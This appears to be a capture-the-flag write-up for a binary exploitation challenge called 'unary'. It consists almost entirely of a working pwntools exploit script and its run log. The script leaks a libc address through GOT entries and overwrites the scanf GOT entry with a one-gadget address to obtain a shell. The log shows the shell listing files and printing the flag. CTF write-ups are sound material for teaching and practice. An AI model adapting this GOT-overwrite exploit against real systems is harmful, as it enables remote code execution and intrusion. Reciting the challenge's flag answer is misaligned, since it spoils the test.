Tags: binary overflow pwn exploit 

Rating:

```python
#!/usr/bin/python2

from pwn import *
import sys

LOCAL = True
context.arch = 'x86_64'

LIBC = ELF('./libc-2.27.so', checksec=False)
LIBC_SCANF = LIBC.symbols['__isoc99_scanf']
SCANF_GOT = 0x0000000000601030
PUTS_GOT = 0x0000000000601018
S_FORMAT = 0x400916 # %s
BASE = 0x600e00

def info(s):
log.info(s)


def exploit(r):

# Remote
ONE_SHOT_OFFSET = 0x4f322

# drop dummy output
r.readuntil(':')

# PUTS
r.sendline('%d' % ((PUTS_GOT - BASE) / 8 + 1))
r.sendline("%d" % SCANF_GOT) # SCANF_GOT

libc_leak = u64(r.readline().strip().split('=')[1].strip().rjust(8, '0'))
libc_leak = int(hex(libc_leak)[:-4], 16)
libc = libc_leak - LIBC_SCANF
system = libc + ONE_SHOT_OFFSET
info("Libc Leak: {}".format(hex(libc_leak)))
info("Libc Base: {}".format(hex(libc)))
info("System : {}".format(hex(system)))

# drop dummy output
r.readuntil(':')

# SCANF
r.sendline('%d' % ((SCANF_GOT - BASE) / 8 + 1))
r.sendline("%d" % S_FORMAT) # %s
r.sendline(p8(0x00) * 4 + p64(system) * 6)

# drop dummy output
r.readuntil(':')

# exit
r.sendline(str(0))

r.interactive()


if __name__ == '__main__':

HOST, PORT = "66.172.27.144", 9004
if len(sys.argv) > 1:
r = remote(HOST, PORT)
exploit(r)
else:
r = process(['./unary'])
print(util.proc.pidof(r))
pause()
exploit(r)
```

run:
```bash
$ python2 ./x.py 1
[+] Opening connection to 66.172.27.144 on port 9004: Done
[*] Libc Leak: 0x7f53348bfec0
[*] Libc Base: 0x7f5334844000
[*] System : 0x7f5334893322
[*] Switching to interactive mode
$ ls
flag.txt
redir.sh
unary
$ cat flag.txt
SUSEC{0p3r4710n_w17h_0n1y_1_0p3r4nd}
```